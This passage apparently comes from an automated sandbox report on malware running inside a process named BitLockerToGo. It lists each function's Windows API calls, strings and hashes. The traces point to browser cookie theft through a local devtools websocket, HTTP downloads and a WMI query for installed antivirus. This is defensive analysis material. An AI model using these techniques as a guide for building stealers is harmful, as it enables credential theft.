                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A07E0E: InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 02A07E3C
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A08C21
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,ws://localhost:9223), ref: 02A08C3B
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A08C5A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1045E: _memmove.LIBCMT ref: 02A10478
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$InternetOpen_memmove_memset
                                                                                                                                                                                                                                                                                                                                                          • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 216805803-4155744131
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3d962433a930897a09198cc19d35cec64c6db7093bd02eb12c259f08da1882ab
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a5e986d4089fddddb4df183fc9bf85f228171ae0d46d0e358254b7b0733565ba
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d962433a930897a09198cc19d35cec64c6db7093bd02eb12c259f08da1882ab
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75612C71D406289FDB20EB64DD85BDEB7B9AF04311F4045E5AA09E3180DEB4ABC9CF50
                                                                                                                                                                                                                                                                                                                                                          Function 02A0688F Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A068F1
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A0690B
                                                                                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A0693A
                                                                                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A06979
                                                                                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A069A9
                                                                                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A069B4
                                                                                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02A069D8
                                                                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000007CF,?), ref: 02A06A6C
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A06A7C
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A06A88
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A06A94
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                                                                                                                                                                                          • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3863758870-2509457195
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 150ecbeccebec24e3675dfa31729b12563ce7139cb261bef75b8e1765c59a772
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7f278ff763b03671b49e538bad5d3e480b3e25951c5ba0eb7cba005f67fb8e0c
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 150ecbeccebec24e3675dfa31729b12563ce7139cb261bef75b8e1765c59a772
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35518D71D40169AFEF21AB60ED84BAEB7F9FB04744F0081A1FA48A6090DF305E949F90
                                                                                                                                                                                                                                                                                                                                                          Function 02A0515F Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 161networkmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02A051A6
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A051AD
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02A051CF
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A051E9
                                                                                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A05219
                                                                                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A05258
                                                                                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A05288
                                                                                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A05293
                                                                                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 02A052BC
                                                                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 02A05302
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A05361
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A0536D
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A05379
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: GET
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: da796efefec5935aee05cdd7dc4fe9bfd15bf154580aebee1455cc664eb7b52d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b585e0f994aaf7cb95f6e8c2f2cd4ab9ffc44cd97ec0369150a9d435eeed4ecb
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da796efefec5935aee05cdd7dc4fe9bfd15bf154580aebee1455cc664eb7b52d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C513B75D40928AFDB209F64DC85BABBBB9FB08306F0445E5BA05A2180DB715F908F51
                                                                                                                                                                                                                                                                                                                                                          Function 02A135F3 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 02A135FA
                                                                                                                                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000000), ref: 02A13609
                                                                                                                                                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A1361A
                                                                                                                                                                                                                                                                                                                                                          • CoCreateInstance.COMBASE(02A33F70,00000000,00000001,02A33EA0,?), ref: 02A13634
                                                                                                                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A1366A
                                                                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 02A136B9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1399E: LocalAlloc.KERNEL32(00000040,00000005,?,?,02A136DC,?), ref: 02A139A6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1399E: CharToOemW.USER32(?,00000000), ref: 02A139B2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 02A136E7
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4288110179-315474579
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7749d4bd3efe3bcb7497745f709fa6c8b620224e0dac82f4e3e84e7beca361dc
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7ec1e20a9aa9be24f7555c192b8f4ba15403a68079934a4630f6c4ea204e0bc2
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7749d4bd3efe3bcb7497745f709fa6c8b620224e0dac82f4e3e84e7beca361dc
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 473117B1A40245BBEB11DB95CC49EAFBBBDFFC5B20F10454AF512AA290DA709901CB60
                                                                                                                                                                                                                                                                                                                                                          Function 02A01274 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A01297
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A012A6
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC08), ref: 02A012C0
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC0C), ref: 02A012CE
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC10), ref: 02A012DC
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC14), ref: 02A012EA
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC18), ref: 02A012F8
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC1C), ref: 02A01306
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC20), ref: 02A01314
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC24), ref: 02A01322
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC28), ref: 02A01330
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC2C), ref: 02A0133E
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC30), ref: 02A0134C
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC34), ref: 02A0135A
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC38), ref: 02A01368
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128E1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A01375), ref: 02A128ED
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128E1: RtlAllocateHeap.NTDLL(00000000), ref: 02A128F4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128E1: GetComputerNameA.KERNEL32(00000000,02A01375), ref: 02A12908
                                                                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02A013D3
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2891980384-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6e57064381caf53eba82657b6743d3ef8bf07d1264ca970ebbf41f9685ada489
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a235f76a231d654aec98dccd836cd32c52ddfb0fb1f421b8b9a8452245b39ab3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e57064381caf53eba82657b6743d3ef8bf07d1264ca970ebbf41f9685ada489
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB4181B1D4422C66EF719B709C89BDB7BADAF19314F5009D1B48DE3080EF74DA858BA0
                                                                                                                                                                                                                                                                                                                                                          Function 02A12E5F Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,02A37816,00000000,?,?), ref: 02A12ECF
                                                                                                                                                                                                                                                                                                                                                          • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 02A12F0C
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A12F39
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 02A12F58
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 02A12F8E
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A12FA3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,02A37E28), ref: 02A13038
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 02A130A2
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 02A130C2
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 02A130CE
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
